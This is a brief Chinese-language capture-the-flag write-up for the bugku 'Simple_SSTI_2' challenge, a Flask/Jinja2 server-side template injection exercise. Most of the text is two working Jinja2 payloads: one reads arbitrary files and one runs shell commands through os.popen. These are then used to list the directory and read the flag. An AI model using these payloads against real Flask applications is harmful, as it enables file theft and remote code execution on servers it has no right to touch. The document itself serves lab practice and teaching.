bugku Simple_SSTI_2 wp

题目是 Simple SSTI 说明是模板注入

传参测试

2*4被执行了
先传点错误语句看看是什么模板

得到信息是python的flask模板注入题，而且是python3.7
网上查找一些payload
文件读写

{
     % for c in [].__class__.__base__.__subclasses__() %}{
     % if c.__name__=='catch_warnings' %}{
     {
      c.__init__.__globals__['__builtins__'].open('在这里输文件名', 'r').read() }}{
     % endif %}{
     % endfor %}

命令执行

{
     % for c in [].__class__.__base__.__subclasses__() %}{
     % if c.__name__=='catch_warnings' %}{
     {
      c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('在这里输命令').read()") }}{
     % endif %}{
     % endfor %}

先执行ls看看

看到flag就在当前目录了
执行cat flag就能拿到flag

或者用读文件的payload

也可以拿到flag